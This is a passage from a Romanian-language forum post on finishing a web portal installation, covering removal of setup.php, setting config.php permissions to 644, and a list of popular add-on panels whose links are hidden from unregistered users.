stergeti de pe host setup.php si schimbati la config.php CHMOD la 644.Asta este toata instalarea,dupa aceea pentru a va imbunatati calitatea portalului dumneavoastra aveti nevoie de INFUZII aveti mai jos cateva infuzii destul de populare : BootSlap Panel ([Only Registered And Activated Users Can See Links]) Scroling Shoutbox Panel ([Only Registered And Activated Users Can See Links]) Status Panel ([Only Registered And Activated Users Can See Links]) User Extended Panel ([Only Registered And Activated Users Can See Links]) Forum Ranks ([Only Registered And Activated Users Can See Links]) Bafta Credits:mortal-team
  25. Asta zice ca e ceva de actualizat :idea:
×
×
  • Create New...